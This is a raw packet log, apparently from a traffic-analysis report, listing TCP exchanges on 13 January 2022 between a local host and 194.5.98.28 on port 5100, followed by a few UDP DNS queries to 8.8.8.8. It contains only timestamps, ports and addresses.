Jan 13, 2022 15:34:20.975457907 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.975511074 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.975703001 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.975903988 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.975970984 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.975997925 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.976874113 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.976932049 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.977221966 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977238894 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977294922 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977294922 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.977463961 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977516890 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.977674961 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977693081 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977746964 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.977796078 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977833033 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.977895021 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.978001118 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.978266001 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.978327990 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.978410959 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.978429079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.978523970 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.978693962 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979005098 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979029894 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979055882 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979243040 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.979456902 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979476929 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979492903 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979541063 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.979552984 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.979584932 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.980701923 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.980731964 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.980859995 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.981462002 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981525898 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981558084 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981590033 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981616974 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981633902 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.981646061 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981672049 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.981678963 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981709003 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981739044 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.981817961 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.981944084 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.981976986 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982003927 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982033968 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.982053041 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982093096 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982131004 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.982167006 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982206106 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982325077 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.982393026 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982566118 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.982630014 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982671022 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.982777119 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:20.983154058 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.983196020 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.983377934 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.984303951 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.984342098 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:20.987046003 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.193223000 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.193299055 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.193346977 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.194575071 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.194618940 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.194649935 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195393085 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195426941 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195456982 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195487022 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195727110 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195756912 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195786953 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.195818901 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.196257114 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.196286917 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.196316957 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.196346998 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197098970 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197129965 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197496891 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197527885 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197557926 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197587967 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197948933 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.197981119 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199383020 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199414015 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199443102 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199472904 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199907064 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199939013 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199966908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.199996948 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.201617956 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.201648951 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202111006 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.202282906 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202308893 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202331066 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202353001 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202373981 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202393055 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.202413082 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.203313112 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.203334093 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.203355074 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.203376055 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.204426050 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.204451084 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.204477072 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.207501888 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.207549095 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.207577944 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.207668066 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.207789898 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.418729067 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.418776989 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.418809891 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.418843985 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.418859005 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.418900013 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.419908047 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.419941902 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.419970989 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.420083046 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.420147896 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.424323082 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424355984 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424386024 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424417019 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424417019 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.424448013 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424462080 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.424526930 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424578905 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.424894094 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424926043 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.424956083 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.425021887 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.425256968 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.425600052 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.426006079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.427129984 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.427337885 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.427911997 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429137945 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429177046 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429213047 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429215908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429256916 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429272890 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429296017 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429333925 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429352999 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429373026 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429411888 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429430008 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429450989 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429490089 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429516077 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429528952 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429567099 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429582119 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429605007 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429642916 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429672956 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429682016 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429723024 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429761887 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429778099 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429812908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429853916 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.429883003 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.429925919 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430111885 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.430140972 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430181980 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430221081 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430224895 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.430259943 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430296898 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430301905 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.430335999 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430372953 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430408955 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430423975 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.430448055 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.430517912 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.635314941 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635379076 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635421038 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635457039 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635481119 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.635497093 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635539055 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635543108 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.635576010 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635675907 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.635675907 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.635793924 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.635915041 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636173964 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636210918 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636250973 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636301994 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.636341095 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.636357069 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636428118 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636590004 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.636693001 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636732101 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.636863947 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641063929 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641105890 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641144037 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641177893 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641180038 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641241074 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641441107 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641480923 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641560078 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641721964 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641763926 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641801119 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641838074 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641870022 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641922951 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.641937971 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.641963005 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642263889 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642303944 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642339945 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642355919 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.642379999 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642419100 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642435074 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.642494917 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.642788887 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642829895 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.642914057 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.643984079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644023895 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644061089 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644088030 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.644099951 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644139051 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644160986 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.644175053 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.644210100 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.648471117 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.648511887 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.648540974 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.648549080 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.648587942 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.648603916 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.648679972 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.648777962 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649040937 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649085045 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649122000 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649142981 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649159908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649200916 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649215937 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649238110 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649276018 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649313927 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649374008 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649512053 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649549007 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649586916 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649683952 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649748087 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649790049 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.649837971 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.649940968 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650106907 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.650353909 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650392056 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650429964 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650448084 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.650466919 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650500059 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:21.650521040 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.702195883 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:21.804135084 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:22.076451063 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:22.194616079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:22.215074062 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:22.431885004 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:22.436353922 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:22.653078079 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:22.653249025 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:22.869729042 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:22.870261908 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:23.138712883 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:23.138775110 CET	49830	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:34:23.405479908 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:24.357167006 CET	5100	49830	194.5.98.28	192.168.2.3
Jan 13, 2022 15:34:24.406516075 CET	49830	5100	192.168.2.3	194.5.98.28

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2022 15:32:22.209491968 CET	57875	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:22.405813932 CET	53	57875	8.8.8.8	192.168.2.3
Jan 13, 2022 15:32:28.565608978 CET	54154	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:28.585058928 CET	53	54154	8.8.8.8	192.168.2.3
Jan 13, 2022 15:32:35.717637062 CET	52806	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:35.830668926 CET	53	52806	8.8.8.8	192.168.2.3
Jan 13, 2022 15:32:41.991347075 CET	64021	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:42.010797024 CET	53	64021	8.8.8.8	192.168.2.3
Jan 13, 2022 15:32:48.289732933 CET	60784	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:48.402158022 CET	53	60784	8.8.8.8	192.168.2.3
Jan 13, 2022 15:32:54.779721975 CET	51143	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:32:54.892461061 CET	53	51143	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:01.219548941 CET	56009	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:01.332628012 CET	53	56009	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:07.577388048 CET	55102	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:07.691279888 CET	53	55102	8.8.8.8	192.168.2.3
Jan 13, 2022 15:33:13.824532986 CET	49559	53	192.168.2.3	8.8.8.8
Jan 13, 2022 15:33:13.938371897 CET	53	49559	8.8.8.8	192.168.2.3
